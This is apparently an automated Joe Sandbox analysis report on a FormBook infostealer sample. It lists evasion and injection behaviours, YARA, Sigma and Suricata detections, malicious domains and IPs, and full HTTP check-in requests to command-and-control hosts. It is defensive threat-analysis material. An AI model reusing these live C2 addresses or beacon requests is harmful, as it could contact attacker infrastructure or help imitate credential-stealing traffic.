Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ek8LkB2Cgo.exe

Overview

General Information

Sample name:ek8LkB2Cgo.exe
renamed because original name is a hash value
Original sample name:00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959.exe
Analysis ID:1568372
MD5:0e566d86bc0eb9416765e07f7ba17392
SHA1:2e1611cb6b9475a463765c05c0a3819d4ae9fd25
SHA256:00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ek8LkB2Cgo.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\ek8LkB2Cgo.exe" MD5: 0E566D86BC0EB9416765E07F7BA17392)
    • svchost.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\ek8LkB2Cgo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • RlKZsaoEJNpD.exe (PID: 5764 cmdline: "C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sethc.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\sethc.exe" MD5: AA9A6E4DADA121001CFDF184B9758BBE)
          • RlKZsaoEJNpD.exe (PID: 7000 cmdline: "C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ParentImage: C:\Users\user\Desktop\ek8LkB2Cgo.exe, ParentProcessId: 7632, ParentProcessName: ek8LkB2Cgo.exe, ProcessCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ProcessId: 7708, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ParentImage: C:\Users\user\Desktop\ek8LkB2Cgo.exe, ParentProcessId: 7632, ParentProcessName: ek8LkB2Cgo.exe, ProcessCommandLine: "C:\Users\user\Desktop\ek8LkB2Cgo.exe", ProcessId: 7708, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T15:31:24.306593+010020507451Malware Command and Control Activity Detected192.168.2.749771172.67.185.680TCP
                2024-12-04T15:31:49.735217+010020507451Malware Command and Control Activity Detected192.168.2.749825156.251.17.22480TCP
                2024-12-04T15:32:04.688712+010020507451Malware Command and Control Activity Detected192.168.2.749856172.67.145.23480TCP
                2024-12-04T15:32:19.812101+010020507451Malware Command and Control Activity Detected192.168.2.74989113.248.169.4880TCP
                2024-12-04T15:32:55.177168+010020507451Malware Command and Control Activity Detected192.168.2.74992443.199.54.15880TCP
                2024-12-04T15:33:10.647912+010020507451Malware Command and Control Activity Detected192.168.2.749991136.143.186.1280TCP
                2024-12-04T15:33:25.704735+010020507451Malware Command and Control Activity Detected192.168.2.749996172.67.192.20780TCP
                2024-12-04T15:33:40.669477+010020507451Malware Command and Control Activity Detected192.168.2.750000203.161.43.22880TCP
                2024-12-04T15:33:56.925217+010020507451Malware Command and Control Activity Detected192.168.2.7500048.223.59.21380TCP
                2024-12-04T15:34:12.096342+010020507451Malware Command and Control Activity Detected192.168.2.75000854.176.168.5880TCP
                2024-12-04T15:34:27.408010+010020507451Malware Command and Control Activity Detected192.168.2.750012199.59.243.22780TCP
                2024-12-04T15:34:43.331647+010020507451Malware Command and Control Activity Detected192.168.2.75001685.159.66.9380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.duwixushx.xyz/fyc8/Avira URL Cloud: Label: malware
                Source: http://www.aextligrwjv.best/msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8JAvira URL Cloud: Label: malware
                Source: http://www.duwixushx.xyz/fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OPAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: ek8LkB2Cgo.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ek8LkB2Cgo.exeJoe Sandbox ML: detected
                Source: ek8LkB2Cgo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: sethc.pdbGCTL source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RlKZsaoEJNpD.exe, 00000005.00000000.1468541461.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp, RlKZsaoEJNpD.exe, 00000007.00000000.1632177564.0000000000AAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ek8LkB2Cgo.exe, 00000000.00000003.1309997616.0000000004080000.00000004.00001000.00020000.00000000.sdmp, ek8LkB2Cgo.exe, 00000000.00000003.1308681911.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443349259.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1449140378.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1542960745.0000000003200000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, sethc.exe, 00000006.00000002.3778379933.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1561229926.0000000004A15000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778379933.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe, 00000006.00000003.1558779585.000000000486F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sethc.pdb source: svchost.exe, 00000002.00000003.1511378407.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1511473960.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000005.00000002.3777425420.000000000131E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: sethc.exe, 00000006.00000002.3776235683.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, sethc.exe, 00000006.00000002.3778868913.00000000051EC000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000031DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1865208225.000000000692C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00536CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00536CA9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_005360DD
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_005363F9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0053EB60
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053F56F FindFirstFileW,FindClose,0_2_0053F56F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0053F5FA
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541B2F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00541C8A
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00541F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00541F94
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00C9C670 FindFirstFileW,FindNextFileW,FindClose,6_2_00C9C670
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 4x nop then xor eax, eax6_2_00C89EA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 4x nop then mov ebx, 00000004h6_2_04AB04EF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49771 -> 172.67.185.6:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49825 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49856 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49891 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49924 -> 43.199.54.158:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49991 -> 136.143.186.12:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49996 -> 172.67.192.207:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50004 -> 8.223.59.213:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50000 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50012 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50008 -> 54.176.168.58:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50016 -> 85.159.66.93:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.duwixushx.xyz
                Source: DNS query: www.futurorks.xyz
                Source: DNS query: www.dating-ml-es.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 136.143.186.12 136.143.186.12
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00544EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00544EB5
                Source: global trafficHTTP traffic detected: GET /msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.aextligrwjv.bestConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.duwixushx.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.vayui.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.remedies.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.327531.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /hxjq/?GhEtuH=BKNo6O8yWzEApXpxZdhvBLsS4mUhkJt064RYd0HbUq7fKEZlE0/hsCP6DjMyuX8dqHZGPQa4k2P/eM3nbiU+NzaMvzu4IfNUiCKwEJ3hTOhx8HANTpWY2e8g5zzoSZCTjrGp61nu9rmD&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.everythlngict.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.3kw40881107247y.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.futurorks.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.hwbzfdtn.tokyoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /zgqx/?GhEtuH=vpXfiL7xAiwEgavhBJ5+dVbyToiv3Ajc9/9k/kyom/IPODfyHTsY9MNM1oIIcM9OOPgjl+yjy+dwg4YL1U+Z+aAXCKq38CY4+hImZkjI6IAgM5qe0htR9lzNJYnqwffYKnUXs/x3ziJB&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.129glenforest.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.dating-ml-es.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
